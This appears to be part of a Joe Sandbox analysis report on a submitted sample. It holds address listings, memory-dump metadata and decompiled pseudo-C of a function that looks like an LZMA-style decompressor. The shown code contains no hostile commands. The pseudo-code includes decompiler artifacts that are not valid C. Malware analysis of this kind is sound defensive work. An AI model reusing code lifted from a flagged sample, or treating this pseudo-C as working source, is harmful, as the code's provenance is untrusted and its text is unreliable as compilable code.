                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407066
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x00407098
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                    • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                    • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                    • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040672B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E0040672B(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040717D))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
